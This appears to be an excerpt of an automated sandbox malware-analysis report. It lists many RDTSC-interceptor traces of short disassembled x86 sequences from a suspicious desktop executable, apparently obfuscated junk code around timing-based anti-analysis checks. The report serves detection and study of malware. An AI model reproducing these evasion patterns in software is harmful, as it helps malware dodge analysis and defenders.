Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7411444 second address: 7411458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+1Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov cx, 7A6Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7411458 second address: 741145D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741145D second address: 74114C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+20h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FB0A5355D64h 0x00000013 and eax, 13754DC8h 0x00000019 jmp 00007FB0A5355D5Bh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007FB0A5355D68h 0x00000025 or al, 00000028h 0x00000028 jmp 00007FB0A5355D5Bh 0x0000002d popfd 0x0000002e popad 0x0000002f mov dword ptr [edx+20h], eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74114C9 second address: 74114CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74114CD second address: 74114E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74114E8 second address: 741156E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+24h] 0x0000000c jmp 00007FB0A4FB5B8Eh 0x00000011 mov dword ptr [edx+24h], eax 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FB0A4FB5B8Eh 0x0000001b sbb ecx, 25D17748h 0x00000021 jmp 00007FB0A4FB5B8Bh 0x00000026 popfd 0x00000027 mov si, 3EBFh 0x0000002b popad 0x0000002c mov eax, dword ptr [esi+28h] 0x0000002f jmp 00007FB0A4FB5B92h 0x00000034 mov dword ptr [edx+28h], eax 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a jmp 00007FB0A4FB5B8Dh 0x0000003f mov ecx, 4B0B6C97h 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741156E second address: 7411574 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7411574 second address: 7411578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7411578 second address: 74115D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, dword ptr [esi+2Ch] 0x0000000e jmp 00007FB0A5355D66h 0x00000013 mov dword ptr [edx+2Ch], ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FB0A5355D5Dh 0x0000001f xor ch, FFFFFFD6h 0x00000022 jmp 00007FB0A5355D61h 0x00000027 popfd 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74115D1 second address: 74115D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74115D6 second address: 741162E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [esi+30h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007FB0A5355D5Bh 0x00000015 pushfd 0x00000016 jmp 00007FB0A5355D68h 0x0000001b add si, 5588h 0x00000020 jmp 00007FB0A5355D5Bh 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741162E second address: 7411634 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7411634 second address: 7411638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7411638 second address: 74116CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov word ptr [edx+30h], ax 0x0000000f jmp 00007FB0A4FB5B96h 0x00000014 mov ax, word ptr [esi+32h] 0x00000018 jmp 00007FB0A4FB5B90h 0x0000001d mov word ptr [edx+32h], ax 0x00000021 pushad 0x00000022 mov bl, ch 0x00000024 jmp 00007FB0A4FB5B93h 0x00000029 popad 0x0000002a mov eax, dword ptr [esi+34h] 0x0000002d pushad 0x0000002e jmp 00007FB0A4FB5B94h 0x00000033 movzx esi, di 0x00000036 popad 0x00000037 mov dword ptr [edx+34h], eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FB0A4FB5B98h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74116CB second address: 74116D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74116D2 second address: 74116F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 test ecx, 00000700h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB0A4FB5B94h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74116F5 second address: 7411707 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0A5355D5Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7411707 second address: 741171B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FB1132A3B8Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741171B second address: 7411721 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7411721 second address: 7411809 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, F2A4h 0x00000007 mov ax, bx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d or dword ptr [edx+38h], FFFFFFFFh 0x00000011 pushad 0x00000012 pushad 0x00000013 mov eax, edi 0x00000015 pushfd 0x00000016 jmp 00007FB0A4FB5B97h 0x0000001b adc esi, 7831776Eh 0x00000021 jmp 00007FB0A4FB5B99h 0x00000026 popfd 0x00000027 popad 0x00000028 pushfd 0x00000029 jmp 00007FB0A4FB5B90h 0x0000002e add ecx, 0D750AE8h 0x00000034 jmp 00007FB0A4FB5B8Bh 0x00000039 popfd 0x0000003a popad 0x0000003b or dword ptr [edx+3Ch], FFFFFFFFh 0x0000003f pushad 0x00000040 movzx esi, bx 0x00000043 mov dh, E3h 0x00000045 popad 0x00000046 or dword ptr [edx+40h], FFFFFFFFh 0x0000004a pushad 0x0000004b pushad 0x0000004c pushfd 0x0000004d jmp 00007FB0A4FB5B90h 0x00000052 xor cl, 00000078h 0x00000055 jmp 00007FB0A4FB5B8Bh 0x0000005a popfd 0x0000005b popad 0x0000005c pushfd 0x0000005d jmp 00007FB0A4FB5B98h 0x00000062 sbb ecx, 6DE282D8h 0x00000068 jmp 00007FB0A4FB5B8Bh 0x0000006d popfd 0x0000006e popad 0x0000006f pop esi 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007FB0A4FB5B95h 0x00000077 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7411809 second address: 741181E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 40h 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b pushad 0x0000000c mov ecx, 7B0A7081h 0x00000011 push eax 0x00000012 push edx 0x00000013 mov ebx, esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741181E second address: 7411822 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7460DA0 second address: 7460DA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7460DA4 second address: 7460DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7460DAA second address: 7460E37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB0A5355D68h 0x00000009 add ecx, 7AC767C8h 0x0000000f jmp 00007FB0A5355D5Bh 0x00000014 popfd 0x00000015 mov ax, 193Fh 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FB0A5355D60h 0x00000024 sbb ecx, 14B26A28h 0x0000002a jmp 00007FB0A5355D5Bh 0x0000002f popfd 0x00000030 mov ah, 23h 0x00000032 popad 0x00000033 push eax 0x00000034 pushad 0x00000035 movzx eax, di 0x00000038 jmp 00007FB0A5355D5Dh 0x0000003d popad 0x0000003e xchg eax, ebp 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FB0A5355D68h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7460E37 second address: 7460E3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73A0049 second address: 73A0061 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0A5355D64h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73A0061 second address: 73A0097 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov bh, 9Dh 0x00000011 pushfd 0x00000012 jmp 00007FB0A4FB5B8Ch 0x00000017 xor si, D258h 0x0000001c jmp 00007FB0A4FB5B8Bh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73A0097 second address: 73A00AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 mov edi, 348F0746h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73A00AD second address: 73A00B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73A00B1 second address: 73A00B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73A00B7 second address: 73A00BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73A00BD second address: 73A00C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73A00C1 second address: 73A00D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73A00D0 second address: 73A00D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73A00D4 second address: 73A00E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B8Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73A0726 second address: 73A072A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73A072A second address: 73A0730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73A0730 second address: 73A0737 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 39h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73A0737 second address: 73A0790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FB0A4FB5B94h 0x00000011 jmp 00007FB0A4FB5B95h 0x00000016 popfd 0x00000017 pushfd 0x00000018 jmp 00007FB0A4FB5B90h 0x0000001d adc ax, 69F8h 0x00000022 jmp 00007FB0A4FB5B8Bh 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73A0AC2 second address: 73A0AC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73A0AC8 second address: 73A0ACC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73D000A second address: 73D0051 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB0A5355D60h 0x00000008 push ecx 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007FB0A5355D5Ch 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 movzx eax, bx 0x0000001a call 00007FB0A5355D69h 0x0000001f pop ecx 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73D0051 second address: 73D007D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB0A4FB5B97h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73D007D second address: 73D0095 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0A5355D64h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73D0095 second address: 73D00C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FB0A4FB5B96h 0x00000012 and esp, FFFFFFF0h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 mov di, si 0x0000001b rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73D00C7 second address: 73D00E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b mov ch, 0Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73D00E7 second address: 73D0105 instructions: 0x00000000 rdtsc 0x00000002 mov esi, edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 sub esp, 44h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB0A4FB5B92h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73D0105 second address: 73D017E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FB0A5355D64h 0x00000011 xor ax, 98A8h 0x00000016 jmp 00007FB0A5355D5Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FB0A5355D68h 0x00000022 adc ax, 8B08h 0x00000027 jmp 00007FB0A5355D5Bh 0x0000002c popfd 0x0000002d popad 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FB0A5355D64h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73D017E second address: 73D01A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FB0A4FB5B96h 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73D01A9 second address: 73D0205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 mov bx, cx 0x00000009 mov si, 4BD1h 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FB0A5355D5Dh 0x00000017 and esi, 1AE488E6h 0x0000001d jmp 00007FB0A5355D61h 0x00000022 popfd 0x00000023 push eax 0x00000024 pop ecx 0x00000025 popad 0x00000026 xchg eax, esi 0x00000027 pushad 0x00000028 mov di, 487Ah 0x0000002c mov ah, dh 0x0000002e popad 0x0000002f xchg eax, edi 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FB0A5355D64h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73D0205 second address: 73D0214 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73D0214 second address: 73D02A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FB0A5355D61h 0x0000000f xchg eax, edi 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FB0A5355D5Ch 0x00000017 sub al, FFFFFFA8h 0x0000001a jmp 00007FB0A5355D5Bh 0x0000001f popfd 0x00000020 mov si, A29Fh 0x00000024 popad 0x00000025 mov edi, dword ptr [ebp+08h] 0x00000028 pushad 0x00000029 mov ebx, ecx 0x0000002b pushfd 0x0000002c jmp 00007FB0A5355D5Ch 0x00000031 and cx, DE08h 0x00000036 jmp 00007FB0A5355D5Bh 0x0000003b popfd 0x0000003c popad 0x0000003d mov dword ptr [esp+24h], 00000000h 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 jmp 00007FB0A5355D5Bh 0x0000004d mov ecx, 23BDE36Fh 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73D02A7 second address: 73D0307 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB0A4FB5B8Eh 0x00000009 and ax, 5398h 0x0000000e jmp 00007FB0A4FB5B8Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 lock bts dword ptr [edi], 00000000h 0x0000001c jmp 00007FB0A4FB5B96h 0x00000021 jc 00007FB114AC7CD1h 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FB0A4FB5B97h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73D0307 second address: 73D031F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0A5355D64h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73D031F second address: 73D0334 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB0A4FB5B8Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73D0334 second address: 73D037A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB0A5355D61h 0x00000009 xor si, 16A6h 0x0000000e jmp 00007FB0A5355D61h 0x00000013 popfd 0x00000014 mov ecx, 538B59D7h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pop esi 0x0000001d jmp 00007FB0A5355D5Ah 0x00000022 pop ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73D037A second address: 73D0380 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73D0380 second address: 73D038F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0A5355D5Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73D038F second address: 73D03BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esp, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB0A4FB5B8Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73D03BF second address: 73D0400 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edi, cx 0x00000010 pushfd 0x00000011 jmp 00007FB0A5355D64h 0x00000016 and ch, FFFFFF98h 0x00000019 jmp 00007FB0A5355D5Bh 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 73F0A50 second address: 73F0A85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push ecx 0x0000000c mov ax, bx 0x0000000f pop ebx 0x00000010 mov eax, 73506D63h 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FB0A4FB5B95h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7400C2F second address: 7400C78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov dx, ax 0x0000000f pushfd 0x00000010 jmp 00007FB0A5355D60h 0x00000015 and ax, 8308h 0x0000001a jmp 00007FB0A5355D5Bh 0x0000001f popfd 0x00000020 popad 0x00000021 push dword ptr [ebp+04h] 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7400C78 second address: 7400C7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7400C7C second address: 7400C97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7400C97 second address: 7400C9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7400C9D second address: 7400CA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74709A5 second address: 74709A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74709A9 second address: 74709AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
